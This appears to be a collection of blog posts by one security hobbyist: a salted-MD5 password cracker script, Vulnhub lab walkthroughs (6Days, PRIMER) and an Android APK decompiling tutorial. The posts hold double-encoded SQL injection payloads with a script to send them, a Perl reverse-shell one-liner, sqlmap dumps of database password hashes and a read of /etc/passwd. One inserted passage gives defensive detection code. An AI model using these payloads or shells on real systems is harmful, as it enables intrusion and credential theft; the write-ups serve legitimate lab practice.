Simple python code for crack md5 double salt

I want to share my simple Python code for cracking MD5 double salt; it is not perfect, but it can be used.
This hash format looks like

md5($salt + $password + $salt)

Because I was curious about the password, I finally tried to write a simple Python script to crack the hash.


Hash file:

The hashes I got are in the format $md5 + $salt (the 32-character digest, a separator, then the salt), and I found the static salt in the source code, for example “Idontwanttosharethissalt”.


Cracking start:

Thank you,
sharing is beautiful 😀



#title : crack md5 double salt
#author: f3ci
#date  : 2016-08-09
#note  : rewritten for Python 3; hash file lines are "<md5 hex>:<salt>"

import hashlib, os, sys
import time

if len(sys.argv) != 3:
    print("[+] Usage: " + os.path.basename(__file__) + " hashfile wordlistfile")
    print("[+] Example: " + os.path.basename(__file__) + " hash.txt rockyou.txt")
    sys.exit(1)

hashpath = sys.argv[1]
wordlist = sys.argv[2]

staticsalt = "Idontwanttosharethissalt"
start = time.time()
recover = 0
hashsum = 0

#open wordlist and try every candidate against one hash/salt pair
def crack(crackdah, salting):
    with open(wordlist, encoding="latin-1") as dictfile:
        for n in dictfile:
            password = n.rstrip("\r\n")
            #hash format: md5(staticsalt + password + salt)
            candidate = (staticsalt + password + salting).encode("latin-1")
            if hashlib.md5(candidate).hexdigest() == crackdah:
                print("%s : %s" % (crackdah, password))
                return True
    return False

#parsing hash and salt
def main():
    global recover, hashsum
    with open(hashpath) as hashfile:
        print("[+] Cracking start")
        hashsum = sum(1 for _ in hashfile)
        print("[+] Total Hash : %s\n" % hashsum)
    with open(hashpath) as hashfile:
        for i in hashfile:
            pars = i.strip()
            hash = pars[0:32]      #first 32 hex chars are the md5 digest
            salt = pars[33:]       #everything after the separator is the salt
            if crack(hash, salt):
                recover += 1
    print("\n[+] Recovered  : %s/%s" % (recover, hashsum))
    print("[+] Total Time : %s seconds " % (time.time() - start))

try:
    main()
except (KeyboardInterrupt, SystemExit):
    print("\n[+] Recovered      : %s/%s" % (recover, hashsum))
    print("[+] Not Recovered  : %s" % (hashsum - recover))
    print("[+] Total Time     : %s seconds " % (time.time() - start))
    print("\n[-] Exit")

The post Simple python code for crack md5 double salt appeared first on 09 Aug 2016.


6 Days Lab 1.1 Vulnhub

Hello 😀

This is my walkthrough for 6Days Lab


Look at the web app…

Look at the page source…

Before I check image.php, I want to try entering something in the promocode form..

I try to use sqlmap with the chardoubleencode tamper option, but it’s not successful; I think because of the IPS, so let’s find another way… Then I find a local file disclosure vulnerability in this web app, which exists because the target uses the readfile function in image.php to fetch images from a file or another site.


I was stuck with this vulnerability for several hours… But after looking at the Apache configuration on the target server and going back to the nmap results, I had an idea for another attack.


With the local file disclosure vulnerability we can reach port 8080 from the target itself. Then, if we look at checkpromo.php, this code has an SQL injection vulnerability. But because the IPS blocks all malicious requests from outside, this SQL injection cannot be exploited directly.


Okay, let’s see whether the IPS still blocks malicious requests if we do the injection from the target itself.


' union all select schema_name,null from information_schema.schemata#

Don’t forget to double encode your payload.

Whoops… nice response from the target, but we should find the right payload for this injection. Let’s look back at the checkpromo.php code.

The checkpromo.php source code states that if the row’s “status” = 0 the target answers “Code expired!”, so we can send a payload slightly different from the previous one: replace “null” with a number, let’s say 1 or 2 or 3.


' union all select schema_name,1 from information_schema.schemata#


Okay bro, I wrote a small script to perform the injection more easily.

import urllib.parse, urllib.request

url = ""  # target URL up to the injectable parameter (left blank in the post)

def encode(sqli):
	# double URL-encode the payload, as described above
	enc = urllib.parse.quote_plus(sqli)
	doubleenc = urllib.parse.quote_plus(enc)
	print("Request : " + url + doubleenc + "\n")
	return doubleenc

def request(doubleenc):
	response = urllib.request.urlopen(url + doubleenc).read().decode(errors="replace")
	print(response)

request(encode("union all select concat(username,':',password),1 from fancydb.users#"))
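The bypass above works because the filter in front of checkpromo.php decodes the request only once. As an added example, not code from the original post, here is how a filter or detector can normalize nested URL-encoding before matching, using the UNION payload from this write-up as a constructed sample; the marker phrases and the `inspect` function are my own choices.

```python
import urllib.parse

# Constructed sample: the UNION payload from the write-up, sent plain,
# URL-encoded once, and URL-encoded twice (the form that passed the IPS).
PAYLOAD = "' union all select schema_name,1 from information_schema.schemata#"
SAMPLES = {
    "plain": PAYLOAD,
    "single": urllib.parse.quote_plus(PAYLOAD),
    "double": urllib.parse.quote_plus(urllib.parse.quote_plus(PAYLOAD)),
}

# Phrase markers with spaces/quotes, so they only match fully decoded text.
SQLI_MARKERS = ("' union", "union all select", "from information_schema.")


def naive_check(value):
    """Decode once, then look for markers: the filter behaviour that double
    encoding slips past (after one decode, spaces are still '+')."""
    decoded = urllib.parse.unquote_plus(value).lower()
    return any(m in decoded for m in SQLI_MARKERS)


def normalize(value, max_rounds=5):
    """Decode repeatedly until the value stops changing.
    Returns (decoded_value, rounds); rounds counts the passes that changed it."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect(value):
    """Normalize first, then match markers. Also flag nested (>1 layer)
    encoding, which normal form submissions do not produce."""
    decoded, rounds = normalize(value)
    lowered = decoded.lower()
    return {
        "nested_encoding": rounds > 1,
        "markers": [m for m in SQLI_MARKERS if m in lowered],
        "decoded": decoded,
    }


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, "naive:", naive_check(sample), "normalized:", inspect(sample))
```

The single-decode check misses the double-encoded sample while the normalized check catches it and additionally flags the nested encoding itself, which is a useful alert on its own.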


Yep, we have credentials now. As we know, SSH is open on the target, so let’s try logging in via SSH as user “andrea”.

Nice, we logged in successfully, but there was a problem: we got a restricted shell that we need to escape.

:):):):):):) but Offsec says Try Harder!

An easy way out of this restricted shell: we can use Python, Perl or another language for a reverse shell; in this case I use Perl.

Perl code:

perl -e 'use Socket;$i="";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


We have a real shell now. There is a dog binary in there, but I have no idea how to root this box using it. I just check the kernel and OS version and then exploit the “overlayfs” vulnerability.


Local Exploit


Thank you vulnhub!

Android Mobile Application Penetration Testing Part 1

Hello fellas,

I want to try to share how to pentest mobile apps on Android; I’m still a newbie too, but hopefully it’s useful 😀
Starting with the static analysis tools I use:

  • dex2jar
  • jd-gui

As usual, since an .apk is just an archive file, we can extract it directly: rename it to .zip first and then extract it, or use apktool to decompile the .apk.

Once extracted/decompiled it looks like the above; you’ll find .dex files, which are Dalvik Executables (search Google if you’re curious what Dalvik is).

Here there are two .dex files; it depends on the app, sometimes one, sometimes two or more. Don’t get confused, the outcome will be the same no matter how many .dex files there are.

First we use dex2jar to decompile the .dex into a .jar.


Once we have the .jar like above, we can open it with jd-gui or extract the .jar again; for now let’s try opening it with jd-gui.

When the .jar is opened it looks like the above; jd-gui can read .class files, so all the Java source code is visible. jd-gui can also decompile the .class files into .java, just use “save all sources” in the File menu.

So isn’t it convenient that everyone can read all of the source inside the .apk?? The answer is yes, everyone can read the source code inside the .apk, but there is a way to make it harder for an attacker to follow the program flow: obfuscation, so all classes, variables etc. in the source get scrambled. Here is roughly what obfuscated code looks like.


As far as I know, that’s how to make it hard for an attacker to read the program flow: the source is obfuscated so class names, variables etc. become a, b, c, d and so on. It makes things a bit more complicated, but if read slowly the attacker will probably still understand it 😀

To make analysis easier, let’s decompile the .class files into .java again so grepping is easy; it’s tiring to read many .class files one by one in jd-gui. From jd-gui just choose the File menu and then “save all sources”.

It will become a zip; extract it and it looks like the above. Next, let’s find where this app’s backend/API is; usually if the source isn’t obfuscated the IP address and URL paths are visible hehe

Found the IP along with the port. I filtered for the word “http” across all the .java sources and finally got 1 IP and 1 domain; now I want to filter by the IP address to see what URLs are inside this app.

Yep, congrats, we got all the URLs it requests in a row, along with the methods it uses and the parameters it needs. In this case I grepped last on port 3006 because, after looking around, port 3006 is for storing data and port 3002 is only for uploading images. We’ll continue in part 2, see ya..



PRIMER 1.0.1 (SQL injection)

Filling a free afternoon,

Lab PRIMER 1.0.1 –,136/?override=1

Starting with nmap

root@kali:~# nmap -sC -sV

Starting Nmap 7.01 ( ) at 2016-02-20 14:57 WIB
Nmap scan report for
Host is up (0.00017s latency).
Not shown: 997 closed ports
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 01:2e:60:5f:99:48:3b:2f:c0:72:c6:ae:48:02:5e:33 (DSA)
|   2048 ed:26:be:cc:c6:2a:93:d1:e1:6d:0d:5a:53:7b:4d:fb (RSA)
|_  256 7f:4e:64:a0:c4:8a:13:8e:e9:86:3d:5d:49:04:c4:54 (ECDSA)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37649/tcp  status
|_  100024  1          47277/udp  status
MAC Address: 00:0C:29:0D:92:09 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds


Check port 80
Hmm, let’s check another interesting page at:
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER


Click the “EOF” button


After opening this page, you can watch my short video to find more interesting pages.


Try to check all the URLs you have already found.


This URL looks like an MD5 hash; let’s split these URLs and crack the MD5.
Watch my short video “again” for the next step 😀

And.. stuck “again” …
After several minutes, I still have no idea about this terminal on the web page, so I just go back to the home page and try to exploit the login form with sqlmap.

root@kali:~# sqlmap -u "" --form --dbs
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601180a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:05:10

[15:05:10] [INFO] testing connection to the target URL
[15:05:10] [INFO] searching for forms
[#1] form:
POST data: usr=&pw=&commit=Login
do you want to test this form? [Y/n/q] 
Edit POST data [default: usr=&pw=&commit=Login] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] n
[15:05:13] [INFO] using '/root/.sqlmap/output/results-02202016_0305pm.csv' as the CSV results file in multiple targets mode
sqlmap got a 302 redirect to ''. Do you want to follow? [Y/n] n


[15:05:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[15:05:25] [INFO] POST parameter 'usr' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:05:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:05:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:05:28] [INFO] checking if the injection point on POST parameter 'usr' is a false positive
POST parameter 'usr' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 95 HTTP(s) requests:
Parameter: usr (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: usr=' AND (SELECT * FROM (SELECT(SLEEP(5)))hAik) AND 'vdbv'='vdbv&pw=&commit=Login
do you want to exploit this SQL injection? [Y/n] 
[15:05:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[15:05:46] [INFO] fetching database names
[15:05:46] [INFO] fetching number of databases
[15:05:46] [INFO] retrieved: 
[15:05:46] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:05:58] [INFO] retrieved: 
[15:06:03] [INFO] adjusting time delay to 1 second due to good response times
[15:07:14] [INFO] retrieved: mysql
[15:07:34] [INFO] retrieved: performance_schema
[15:08:44] [INFO] retrieved: phpmyadmin
[15:09:27] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[15:09:44] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0305pm.csv'

[*] shutting down at 15:09:44

The current DB is “test”, but there is nothing interesting in this database, so let’s just dump the mysql database to get the MySQL root password.

root@kali:~# sqlmap -u "" --form -D mysql -T user -C User,Password --dump


Database: mysql
Table: user
[6 entries]
| User             | Password                                  |
| debian-sys-maint | *0A799FB65F1A7F8E0B0F9C7CBE0983029BDF3D63 |
| phpmyadmin       | *EDDB5D9F648E137B72DC65A9904FBFC9FC4A4C25 |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |

[19:13:31] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/'
[19:13:31] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0713pm.csv'

[*] shutting down at 19:13:31

Then crack the root password hash, and whoops.. the MySQL root password is “PRIMER”.

So what can we gain from this password?
Let’s check whether we have database administrator privileges or not; usually, if we can dump the mysql database, the privilege is “dba”, so let’s try to read a file from the back-end.

root@kali:~# sqlmap -u "" --form --threads=5 --file-read="/etc/passwd"


[19:29:59] [INFO] the local file '/root/.sqlmap/output/' and the remote file '/etc/passwd' have the same size (1493 B)
files saved to [1]:
[*] /root/.sqlmap/output/ (same file)

[19:29:59] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0729pm.csv'

[*] shutting down at 19:29:59

Wohooo.. [*] /root/.sqlmap/output/ (same file) means that the file was successfully extracted.


list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

There is an existing user on this machine, so let’s try to log in to the SSH service with user “nieve” and password “PRIMER”.
But wait… the password “PRIMER” is the MySQL root password; let’s try to get root privileges with this password and just try my luck.
I don’t know whether this is the right way or not, but this is my way and I love my way :p

MYSQL Credentials

User Machine Credentials

Terminal Web – password for connecting to the host




Thank you PRIMER and vulnhub!